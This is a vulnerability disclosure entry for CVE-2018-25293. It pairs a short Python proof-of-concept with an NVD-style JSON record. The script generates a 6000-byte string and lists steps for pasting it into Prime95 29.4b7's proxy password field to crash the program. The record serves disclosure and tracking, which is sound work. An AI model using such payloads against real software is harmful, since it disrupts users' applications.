CVE-2018-25293

# Proof of Concept (PoC) for CVE-2018-25293 # This script generates the payload to trigger the buffer overflow. import sys def generate_payload(length=6000): """ Generates a payload of 'A' characters to crash Prime95. The vulnerability is triggered by a string of approximately 6000 bytes in the 'Optional Proxy Password' field. """ return "A" * length if __name__ == "__main__": payload = generate_payload() print(f"[+] Generated payload with length: {len(payload)}") print("[+] Usage Steps:") print("1. Open Prime95 v29.4b7") print("2. Go to Test -> PrimeNet") print("3. Configure Proxy settings") print("4. Paste the payload below into the 'Optional Proxy Password' field") print("5. Click OK/Save to trigger the crash.") print("\n--- Payload ---") print(payload)

{"cve": {"id": "CVE-2018-25293", "sourceIdentifier": "[email protected]", "published": "2026-04-26T22:17:30.660", "lastModified": "2026-04-27T18:53:00.053", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Prime95 29.4b7 contains a buffer overflow vulnerability in the PrimeNet connection dialog that allows local attackers to crash the application by supplying an excessively long string in the optional proxy password field. Attackers can trigger a denial of service by entering a 6000-byte payload into the proxy password parameter, causing the application to crash when processing the connection settings."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-120"}]}], "references": [{"url": "http://www.mersenne.org", "source": "[email protected]"}, {"url": "http://www.mersenne.org/ftp_root/gimps/p95v294b7.win32.zip", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/45226", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/prime95-29-4b7-denial-of-service-via-proxy-password-field", "source": "[email protected]"}]}}